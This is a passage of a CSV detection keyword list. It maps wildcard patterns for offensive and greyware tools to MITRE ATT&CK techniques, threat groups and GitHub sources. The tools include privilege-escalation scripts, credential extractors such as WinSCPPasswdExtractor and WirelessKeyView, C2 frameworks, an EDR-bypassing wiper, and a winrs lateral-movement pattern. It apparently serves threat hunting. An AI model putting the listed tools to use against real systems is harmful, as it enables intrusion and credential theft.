It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Winpayloads*,offensive_tool_keyword,Winpayloads,Undetectable Windows Payload Generation with extras Running on Python2.7,T1203 - T1027 - T1059,TA0002 - TA0003 - TA0007,N/A,N/A,Defense Evasion,https://github.com/nccgroup/Winpayloads,1,1,N/A,N/A,10,1517,361,2022-11-08T08:14:23Z,2015-10-09T09:29:49Z -*winPEAS.bat*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*winPEAS.bat*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*WinPEAS.exe*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*winPEAS.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*winPEAS.ps1*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*winPEAS.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*winPEASany.exe*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*winPEASany.exe*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*winPEASany_ofs.exe*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*winPEASany_ofs.exe*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*winPEAS-Obfuscated*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*winPEASps1*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*winPEASx64.exe*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*winPEASx64.exe*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*winPEASx64_ofs.exe*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*winPEASx86.exe*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*winPEASx86.exe*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*winPEASx86_ofs.exe*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*winPEASx86_ofs.exe*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*Win-PS2EXE.exe*,offensive_tool_keyword,PS2EXE,Module to compile powershell scripts to executables,T1027.001 - T1564.003 - T1564.005,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/MScholtes/PS2EXE,1,1,N/A,N/A,9,834,154,2023-09-26T15:03:14Z,2019-11-08T09:25:02Z -*WinPwn -*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*WinPwn.exe*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*WinPwn.ps1*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*WinPwnage*,offensive_tool_keyword,WinPwnage,various exploitation tools for windows ,T1203 - T1059 - T1547.001,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/rootm0s/WinPwnage,1,1,N/A,N/A,10,2498,386,2023-02-13T09:43:13Z,2018-04-08T18:51:50Z -*winpwnage.functions*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*winreconstreamline.bat*,offensive_tool_keyword,Windows-Privilege-Escalation,Windows Privilege Escalation Techniques and Scripts,T1055 - T1548 - T1078,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/frizb/Windows-Privilege-Escalation,1,1,N/A,N/A,8,710,185,2020-03-25T22:35:02Z,2017-05-12T13:09:50Z -*winregistry.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*WinRing0*WinRing0x64.sys*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,1,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*winrm_command_shell.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*winrm_script_exec.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*winrmdll *,offensive_tool_keyword,cobaltstrike,C++ WinRM API via Reflective DLL,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mez-0/winrmdll,1,0,N/A,10,10,138,27,2021-09-11T13:44:16Z,2021-09-11T13:40:22Z -*winrmdll.*,offensive_tool_keyword,cobaltstrike,C++ WinRM API via Reflective DLL,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mez-0/winrmdll,1,1,N/A,10,10,138,27,2021-09-11T13:44:16Z,2021-09-11T13:40:22Z -*winrs -r:*whoami*,greyware_tool_keyword,winrs,WinRS for Lateral Movement,T1021.006 - T1028,TA0008 ,N/A,N/A,Lateral Movement,N/A,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*WinSCPPasswdExtractor*,offensive_tool_keyword,WinSCPPasswdExtractor,Extract WinSCP Credentials from any Windows System or winscp config file,T1003.001 - T1083 - T1145,TA0003 - TA0007 - TA0008,N/A,N/A,Credential Access,https://github.com/NeffIsBack/WinSCPPasswdExtractor,1,1,N/A,N/A,1,8,0,2023-07-01T17:27:32Z,2022-12-20T11:55:55Z -*WinShellcode.git*,offensive_tool_keyword,WinShellcode,It's a C code project created in Visual Studio that helps you generate shellcode from your C code.,T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/DallasFR/WinShellcode,1,1,N/A,N/A,,N/A,,, -*WinShellcode-main*,offensive_tool_keyword,WinShellcode,It's a C code project created in Visual Studio that helps you generate shellcode from your C code.,T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/DallasFR/WinShellcode,1,1,N/A,N/A,,N/A,,, -*Winsocky-main*,offensive_tool_keyword,cobaltstrike,Winsocket for Cobalt Strike.,T1572 - T1041 - T1105,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/WKL-Sec/Winsocky,1,1,N/A,10,10,79,13,2023-07-06T11:47:18Z,2023-06-22T07:00:22Z -*WINspect.ps1*,offensive_tool_keyword,WINspect,WINspect is part of a larger project for auditing different areas of Windows environments.It focuses on enumerating different parts of a Windows machine to identify security weaknesses and point to components that need further hardening.can be used by attacker ,T1018 - T1082 - T1057 - T1547.001 - T1053,TA0003 - TA0006 - TA0008 - TA0010,N/A,N/A,Information Gathering,https://github.com/A-mIn3/WINspect,1,1,N/A,N/A,6,568,116,2019-01-09T12:56:57Z,2017-08-10T15:10:10Z -*win-x64-DynamicKernelWinExecCalc*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,1,private github repo,10,,N/A,,, -*Wiper POC tool that wipes a given directory*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,0,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*WiperPoc.exe*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,1,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*WiperPoc\WiperPoc*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,0,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*wireghoul/htshells*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*wireless/captures.py*,offensive_tool_keyword,wifibroot,A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing,T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Network Exploitation tools,https://github.com/hash3liZer/WiFiBroot,1,1,N/A,N/A,9,866,180,2021-01-15T09:07:36Z,2018-07-30T10:57:22Z -*wireless/cracker.py*,offensive_tool_keyword,wifibroot,A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing,T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Network Exploitation tools,https://github.com/hash3liZer/WiFiBroot,1,1,N/A,N/A,9,866,180,2021-01-15T09:07:36Z,2018-07-30T10:57:22Z -*wireless/pmkid.py*,offensive_tool_keyword,wifibroot,A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing,T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Network Exploitation tools,https://github.com/hash3liZer/WiFiBroot,1,1,N/A,N/A,9,866,180,2021-01-15T09:07:36Z,2018-07-30T10:57:22Z -*wireless/sniper.py*,offensive_tool_keyword,wifibroot,A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing,T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Network Exploitation tools,https://github.com/hash3liZer/WiFiBroot,1,1,N/A,N/A,9,866,180,2021-01-15T09:07:36Z,2018-07-30T10:57:22Z -*wireless_attack_tools.py*,offensive_tool_keyword,hackingtool,ALL IN ONE Hacking Tool For Hackers,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/Z4nzu/hackingtool,1,1,N/A,N/A,10,39264,4347,2023-09-13T19:08:33Z,2020-04-11T09:21:31Z -*wirelesskeyview.exe*,offensive_tool_keyword,WirelessKeyView,WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ,T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/wireless_key.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*wirelesskeyview.zip*,offensive_tool_keyword,WirelessKeyView,WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ,T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/wireless_key.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*WirelessKeyView_x64.exe*,offensive_tool_keyword,WirelessKeyView,WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ,T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/wireless_key.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*wirelesskeyview-no-command-line.zip*,offensive_tool_keyword,WirelessKeyView,WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ,T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/wireless_key.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*wirelesskeyview-x64.zip*,offensive_tool_keyword,WirelessKeyView,WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ,T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/wireless_key.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Wireshark*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*wireshark*.deb*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*Wireshark*.dmg*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*wireshark-*.tar.xz*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*wireshark-common*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*wireshark-dev*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*wireshark-gtk*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*WiresharkPortable64*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*wireshark-qt*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*Wireshark-win*.exe*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*wiresocks-main*,offensive_tool_keyword,wiresocks,Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - 